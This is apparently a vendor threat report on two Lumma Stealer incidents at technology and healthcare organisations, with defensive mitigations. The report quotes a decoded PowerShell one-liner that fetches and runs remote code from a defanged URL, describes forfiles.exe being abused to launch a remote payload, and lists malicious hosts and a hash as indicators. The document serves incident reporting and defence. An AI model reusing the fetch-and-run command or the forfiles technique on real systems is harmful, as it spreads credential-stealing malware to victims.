Topline Takeaways
- Industry target: Technology and Healthcare
- Attacker methods:
- Likely Lumma Stealer
- .zip files as payload
- Encoded PowerShell script
- Recommended mitigations:
- Implement behavior-based monitoring.
- Require the use of secure password managers.
Incident Timeline for 2024-10-26 and 2024-10-30
On October 26, 2024, Blackpoint’s MDR technology alerted to encoded PowerShell being executed from a user account of a Technology partner. Blackpoint’s Active SOC isolated the impacted machine to prevent further malicious activity.
Initial investigation identified that the encoded PowerShell decoded to the following: “iex (iwr hxxps[://]iilp[.]b-cdn[.]net/kolo26.txt -UseBasicParsing).Content”.
Blackpoint’s Advanced Pursuit Group (APG) conducted further analysis and identified that this PowerShell calls out to the URL to grab the file “kolo26.txt” and executes it. The URL was found to be holding malicious code that calls upon five different variables to download a .zip file, 1shmkv.zip, and saves it as “pg1.zip” located in the temp directory. The script then unzips the file and executes the binary ashampo.exe.
On October 30, 2024, Blackpoint’s MDR technology alerted to a file, “updater.exe”, located in temp folder within two obfuscated folders on a host of a Healthcare partner. Blackpoint’s SOC isolated the impacted device to prevent further malicious activity.
Initial investigation identified that the threat actor utilized forfiles.exe, a legitimate Windows binary, to remotely execute a remote resource. The threat actor attempted to execute a file, “Pantok”, if “expl*re?.exe” existed within C:\Windows.
Additional analysis identified that the file Pantok was hosted at hxxps[://]cdn-defac13[.]techresource[.]shop/api/reg/Pantok. The file is a previously reported malicious version of cleanmgr.dll. The hash of this file, e2b6e854a400d716e599867276b0cc4ab1dc6ae927cc19db7fde3455cb49dcb6, has been previously attributed to a known downloader that has been used to deploy the Lumma Stealer malware.
More About Lumma Stealer
Lumma Stealer is a malware-as-a-service (MaaS) that has been advertised on cybercriminal forums since at least 2022. The malware is capable of stealing valuable information, including cryptocurrency wallets, browser extensions, MFA instances, and more.
Lumma Stealer is offered for sale on multiple cybercriminal forums, which makes post-incident attribution more difficult. Information stealers are an attractive option for cybercriminals due to the ability to use and/or monetize the information stolen.
APG Threat Analysis for Lumma Stealer
Blackpoint’s APG assesses that threat actors will likely continue to deploy information stealer malware to organizations to gather sensitive information over the next 12 months.
This assessment is based on internal Blackpoint observed attacks, such as incidents on August 15, 2024, involving an Industrials partner.
Additionally, the assessment is support by external reports of incidents that involve the use of Lumma Stealer, such as a reported campaign involving the use of fake CAPTCHA verification to trick users into deploying the Lumma Stealer payload.
Mitigations
- Implement behavior-based monitoring to detect unusual activity patterns, such as suspicious processes attempting to make unauthorized network connections.
- Require the use of secure password managers to make accessing passwords by threat actors more difficult.